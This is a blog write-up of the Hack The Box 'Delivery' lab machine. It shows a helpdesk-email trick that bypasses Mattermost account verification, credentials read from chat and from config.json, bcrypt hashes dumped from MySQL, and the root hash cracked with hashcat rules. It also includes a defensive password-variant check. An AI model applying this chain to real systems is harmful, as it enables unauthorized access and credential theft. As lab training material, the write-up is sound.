3rd August 2021
Hack The Box Delivery Write-Up by T13nn3s

Hack The Box Write-Up Delivery

As always we start with nmap… but it can take a while so I’ve already ran it

ippsec

About Delivery

In this post, I’m writing a write-up for the machine Delivery from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Delivery is an ‘Easy’ rated box. Submitting the user.txt flag raises your points by 10, and submitting the root flag raises them by 15.

Foothold
The Nmap port scan shows two open ports: 22/tcp and 80/tcp. The port scan reveals that this machine is running on Debian 10 and that there is an Nginx web server running on this machine. On the enumeration of 80/tcp, we can discover the hostname helpdesk.delivery.htb and a login page on http://delivery.htb:8065/login through Mattermost. Through the helpdesk, we can create a ticket and through the account creation on Mattermost with the use of the email address from the ticket system, we are able to activate the user account and get access to Mattermost.

User
Through Mattermost, we have access to the chats and we are able to read the credentials for the user account maildeliverer. With this account, we are able to get an SSH session and read the user flag.

Root
Through linpeas.sh, we can discover the directory /opt/mattermost. In this directory, through the config.json file, we can find the credentials for the user mmuser to access MySQL. Through MySQL, we can access the mattermost database and read various password hashes. With hashcat, we can crack those hashes and get the password for the user account root.

Machine IP

Hack The Box Delivery Machine IP and maker

Reconnaissance

As always, we start the machine with an Nmap port scan. But it can take a while, and I’ve not already run it. I need to learn more from ippsec 🙂

~$  nmap -sC -sV -oA ./nmap/10.10.10.222 10.10.10.222 

The results.

 Starting Nmap 7.90SVN ( https://nmap.org ) at 2021-01-25 20:35 CET
 Nmap scan report for 10.10.10.222
 Host is up (0.045s latency).
 Not shown: 998 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Welcome
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 23.55 seconds 

The Nmap port scan discovered two open ports. The first port, 22/tcp, is the default SSH port. From the banner on this port, we can see that we are dealing with a Debian 10 operating system. The second port, 80/tcp, is the default HTTP port. Behind this port, there is a web server running Nginx 1.14.2. At this time of writing, I know that this is not the latest version of Nginx. The web server is returning the HTTP title Welcome. In any case, we are welcomed.

Enumeration Web Server

Let’s start with the enumeration of the web server. We can visit the website through http://10.10.10.222.

Hack The Box Delivery website
http://10.10.10.222

Through http://10.10.10.222/#contact-us we can find the domain name delivery.htb. Let’s add this domain name to our /etc/hosts file. On this webpage, we can discover at least two interesting things. There is a URL leading to the hostname helpdesk.delivery.htb, and there is a URL leading to http://delivery.htb:8065/login. First, we add the hostname we found to our hosts file, and then we can check both URLs.

Enumeration Mattermost

Hack The Box Delivery Mattermost
http://delivery.htb:8065/login

Let’s create a user account and let’s see what we can do with this account. I’ve registered an account with the following credentials.

Email: [email protected]
Username: T13nn3s
Password: [email protected]

After registering the user account, I received a message that a registration email had been sent. So, before we can log in with this user account, we need to confirm the account. I’ve tried to log in, but it’s not working.

Hack The Box Delivery account confirmation
Account verification needed

Enumeration Support Center

Hmm, maybe the Support Center can help me with the verification of my account on Mattermost. Let’s check http://helpdesk.delivery.htb. We’re landing on the webpage as shown below.

Hack The Box Delivery Support Center
http://helpdesk.delivery.htb/

We are logged in as Guest by default. We can create a user account, but unfortunately, we have the same “problem” as with the Mattermost service: we need to verify the account. Looking closer at the email placeholder on the Check Ticket Status page, we can discover the domain osticket.com. Let’s try to create a ticket with the use of this email address, and maybe we can bypass the verification of the account. We have created a ticket with the email address [email protected]; the ticket has the ticket number 3750352. An email address, [email protected], is also created for the ticket. Let’s try to read the status of this ticket.

Hack The Box Delivery Check Ticket Status
Check Ticket Status

We can read the ticket and we can update this ticket. Nice! The other exciting thing is that there is a message visible with a sort of invitation to create a user account with the email address [email protected]. We still need to verify this account, but that is no problem. We can create tickets, so now we have to play around with that a bit. On ticket creation, an email account is created with the ticket number in the email address. With this email account, we can verify our Mattermost account. Let’s create a user account on Mattermost with the email address [email protected].

Create account with the following details:

Hack The Box Delivery Mattermost account creation
Account creation on Mattermost

If we check our ticket, we see that the ticket is updated with the activation URL.

Hack The Box Delivery Mattermost account activation
Activation mail

Intrusion

Access to Mattermost

After using the activation URL, our account is activated and we can log in to Mattermost.

 Hack The Box Delivery Mattermost Internal Group
Mattermost Public Channel Internal

We have been added to the public channel Internal. We see interesting information being exchanged here. For example, we can find the credentials below.

maildeliverer:Youve_G0t_Mail!
??:PleaseSubscribe!

To get further access to this machine, we can try using the credentials we found to get access through SSH.

SSH access as maildeliverer

On the first try, we got access through SSH with the user account maildeliverer. We are able to read the user flag directly.

~$  ssh [email protected]
[email protected]'s password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan 29 16:48:36 2021 from 10.10.16.144
[email protected]:~$ cat user.txt 
b55f6266fa1b0d826efca08cfb01e983
[email protected]:~$ 

Privilege Escalation

Enumeration

Let’s download linpeas.sh to this machine and run it. In the binary process permissions section of the output, one running binary is located in the /opt directory: /opt/mattermost/bin/mattermost.

[email protected]:/tmp$ bash linpeash.sh 
...
[+] Binary processes permissions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
1.5M -rwxr-xr-x 1 root       root       1.5M Oct 24 14:44 /lib/systemd/systemd
144K -rwxr-xr-x 1 root       root       143K Oct 24 14:44 /lib/systemd/systemd-journald
228K -rwxr-xr-x 1 root       root       227K Oct 24 14:44 /lib/systemd/systemd-logind
56K -rwxr-xr-x 1 root       root        55K Oct 24 14:44 /lib/systemd/systemd-timesyncd
664K -rwxr-xr-x 1 root       root       663K Oct 24 14:44 /lib/systemd/systemd-udevd
85M -rwxrwxr-x 1 mattermost mattermost  85M Dec 18 08:53 /opt/mattermost/bin/mattermost
64K -rwxr-xr-x 1 root       root        64K Jan 10  2019 /sbin/agetty
0 lrwxrwxrwx 1 root       root         20 Oct 24 14:44 /sbin/init -> /lib/systemd/systemd
236K -rwxr-xr-x 1 root       root       236K Jul  5  2020 /usr/bin/dbus-daemon
132K -rwxr-xr-x 1 root       root       129K Oct  9  2019 /usr/bin/VGAuthService
56K -rwxr-xr-x 1 root       root        56K Oct  9  2019 /usr/bin/vmtoolsd
56K -rwxr-xr-x 1 root       root        55K Oct 11  2019 /usr/sbin/cron
184K -rwxr-xr-x 1 root       root       183K Apr 10  2019 /usr/sbin/cups-browsed
448K -rwxr-xr-x 1 root       root       447K Nov 28 06:09 /usr/sbin/cupsd
20M -rwxr-xr-x 1 root       root        20M Nov 25 04:50 /usr/sbin/mysqld
688K -rwxr-xr-x 1 root       root       686K Feb 26  2019 /usr/sbin/rsyslogd
792K -rwxr-xr-x 1 root       root       789K Jan 31  2020 /usr/sbin/sshd
...

Let’s check the contents from the directory /opt/mattermost. Maybe we can find some useful information here.

[email protected]:/tmp$ cd /opt/mattermost/
[email protected]:/opt/mattermost$ ls -la
total 288
drwxrwxr-x 12 mattermost mattermost   4096 Dec 26 09:24 .
drwxr-xr-x  3 root       root         4096 Dec 26 09:22 ..
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:53 bin
drwxrwxr-x  7 mattermost mattermost   4096 Dec 26 09:24 client
drwxrwxr-x  2 mattermost mattermost   4096 Dec 26 09:23 config
drwxrwxr-x  3 mattermost mattermost   4096 Jan 29 05:01 data
-rw-rw-r--  1 mattermost mattermost   2052 Dec 18 08:52 ENTERPRISE-EDITION-LICENSE.txt
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:52 fonts
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:52 i18n
drwxrwxr-x  2 mattermost mattermost   4096 Jan 29 16:47 logs
-rw-rw-r--  1 mattermost mattermost    898 Dec 18 08:52 manifest.txt
-rw-rw-r--  1 mattermost mattermost 229264 Dec 18 08:52 NOTICE.txt
drwxr--r--  5 mattermost mattermost   4096 Jan 29 05:04 plugins
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:53 prepackaged_plugins
-rw-rw-r--  1 mattermost mattermost   6262 Dec 18 08:52 README.md
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:52 templates

After some time of searching in this directory, we’ve found what seems to be the username and password for MySQL in the file /opt/mattermost/config/config.json.

[email protected]:/opt/mattermost/config$ cat config.json  
...
"SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    }, 
...

We are able to connect to MariaDB with the credentials we found.

Enumeration MySQL

[email protected]:/opt/mattermost/config$ mysql -u mmuser -pCrack_The_MM_Admin_PW -e "show databases"
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
[email protected]:/opt/mattermost/config$

Let’s connect to the database mattermost with use mattermost;, and list all the tables with show tables;.

MariaDB [(none)]> use mattermost
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed

MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
| Audits                 |
| Bots                   |
| ChannelMemberHistory   |
...
| UploadSessions         |
| UserAccessTokens       |
| UserGroups             |
| UserTermsOfService     |
| Users                  |
+------------------------+

There is an interesting table, called Users, with the command select * from Users; we can read the contents from this table. From the output, we can create a table with the interesting information.

| Id | Username | Password | Email | Role |
|----|----------|----------|-------|------|
| 6akd5cxuhfgrbny81nj55au4za | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | [email protected] | system_user |
| 6wkx1ggn63r7f8q1hpzp7t4iiy | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | [email protected] | system_user |
| dijg7mcf4tf3xrgxi5ntqdefma | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | [email protected] | system_admin system_user |
| hatotzdacb8mbe95hm4ei8i7ny | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | [email protected] | system_user |
| kxxg51bs7t8ujb1bp1gciur6ae | techno | $2a$10$SlpOZeDnPB3p3s6uzqIsuO.nertWPg/bDsePhTg64iRxWB3hcuSF6 | [email protected] | system_user |
| n9magehhzincig4mm97xyft9sc | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | [email protected] | system_user |

We have only the password hashes, so we need to crack those hashes. From the Mattermost chat, we can find the hint to our next step. Those hashes are not in the RockYou database. We need to use hashcat with a ruleset to crack these hashes.

Password crack with Hashcat with rules

On my host, I have an AMD Radeon R9 390 graphics card, which can be used for cracking those hashes. To crack those hashes we need to install hashcat. We only need the password for the user account [email protected], so I added this hash to the file hashes.txt. The hash starts with $2a$10$, which means that it is possibly hashed with bcrypt. Bcrypt is a password-hashing function based on the Blowfish cipher.

Hashcat parameters
For cracking this password, we’re using these parameters:
-a 0 Straight (wordlist) attack mode, the mode used in the command below together with a rule file
-m 3200 Hash mode for bcrypt $2*$, Blowfish (Unix)

Are we just gonna crack the hash? From the Mattermost chat, we know that the password was PleaseSubscribe! Let’s add this password to wordlist.txt. We know that this password is updated, so let’s try to brute-force the password using this ruleset: best64.rule. This ruleset ships with hashcat by default.

C:\Users\T13nn3s\htb\hashcat-6.1.1\hashcat-6.1.1> hashcat.exe -a 0 -m 3200 hashes.txt wordlist.txt -r "C:\Users\T13nn3s\htb\hashcat-6.1.1\hashcat-6.1.1\rules\best64.rule"
...
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Running
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Mon Feb 01 20:50:30 2021 (1 min, 9 secs)
Time.Estimated...: Mon Feb 01 20:55:02 2021 (3 mins, 23 secs)
Guess.Base.......: File (wordlist.txt)
Guess.Mod........: Rules (C:\Users\Martien van Dijk\Downloads\hashcat-6.1.1\hashcat-6.1.1/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        0 H/s (0.00ms) @ Accel:2 Loops:2 Thr:8 Vec:1
Speed.#2.........:        0 H/s (6.31ms) @ Accel:2 Loops:2 Thr:8 Vec:1
Speed.#*.........:        0 H/s
Recovered........: 0/1 (0.00%) Digests
Progress.........: 19/77 (24.68%)
Rejected.........: 0/19 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-0 Iteration:0-2
Restore.Sub.#2...: Salt:0 Amplifier:19-20 Iteration:532-534
Candidates.#1....: [Copying]
Candidates.#2....: PleaseSubscribe!13 -> PleaseSubscribe!13
Hardware.Mon.#1..: Util: 77% Core:1025MHz Mem:1500MHz Bus:16
Hardware.Mon.#2..: Util:100% Core:1025MHz Mem:1500MHz Bus:16

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Mon Feb 01 20:50:30 2021 (1 min, 14 secs)
Time.Estimated...: Mon Feb 01 20:51:44 2021 (0 secs)
Guess.Base.......: File (wordlist.txt)
Guess.Mod........: Rules (C:\Users\Martien van Dijk\Downloads\hashcat-6.1.1\hashcat-6.1.1/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        0 H/s (0.00ms) @ Accel:2 Loops:2 Thr:8 Vec:1
Speed.#2.........:        0 H/s (6.31ms) @ Accel:2 Loops:2 Thr:8 Vec:1
Speed.#*.........:        0 H/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-0 Iteration:0-2
Restore.Sub.#2...: Salt:0 Amplifier:20-21 Iteration:1022-1024
Candidates.#1....: [Copying]
Candidates.#2....: PleaseSubscribe!21 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util:  0% Core:1025MHz Mem:1500MHz Bus:16
Hardware.Mon.#2..: Util:  9% Core:1025MHz Mem:1500MHz Bus:16
Started: Mon Feb 01 20:50:10 2021
Stopped: Mon Feb 01 20:51:46 2021
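The hash fell after 21 of 77 candidates because the root password was only a known password with two digits appended. The following added example (not from the original write-up) is a password-change check that rejects such variants of already-exposed passwords; the class and function names are hypothetical, and the normalisation covers only simple mangling (edge digits and symbols, case, common character substitutions, reversal).

```python
import re

# Common character substitutions, mapped back to letters.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})
# Leading or trailing run of digits, symbols and underscores.
EDGE = re.compile(r"^[\W\d_]+|[\W\d_]+$")


def normal_forms(password):
    """Return the set of base forms a mangled password may reduce to."""
    lowered = password.lower()
    trimmed_first = EDGE.sub("", lowered).translate(LEET)   # trim, then undo substitutions
    unleet_first = EDGE.sub("", lowered.translate(LEET))    # undo substitutions, then trim
    forms = {trimmed_first, unleet_first}
    forms |= {form[::-1] for form in forms}                 # reversed variants
    forms.discard("")
    return forms


class VariantDenyList:
    """Rejects new passwords that reduce to the same base as a known one."""

    def __init__(self, known_passwords):
        self.bases = set()
        for known in known_passwords:
            self.bases |= normal_forms(known)

    def rejects(self, candidate):
        return bool(normal_forms(candidate) & self.bases)


if __name__ == "__main__":
    # The base password is the one shared in the Mattermost channel on this page;
    # the other candidates are constructed for the example.
    deny = VariantDenyList(["PleaseSubscribe!"])
    for candidate in ("PleaseSubscribe!21", "Pl3a$eSub$cribe99",
                      "!ebircsbuSesaelP", "correct horse battery staple 7"):
        print(f"{candidate!r}: {'rejected' if deny.rejects(candidate) else 'accepted'}")
```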

Own Delivery

We are now entering the last phase of rooting this machine, and that’s switching to the user account root and taking the root flag.

[email protected]:/opt/mattermost/config$ su - root
Password: 
[email protected]:~# cat root.txt 
84f2c360a4f254370c2f4280b0624431

Delivery rooted! Well, that was a nice machine, ippsec. Learned some new things. If you liked this write-up, please consider spending a respect point. I really appreciate it. My HTB profile: https://app.hackthebox.eu/profile/224856.

This blog is free of charge. I do not place any advertisements on this website. If you want to support me, you can give me a cup of coffee; black, no sugar.


Happy Hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.
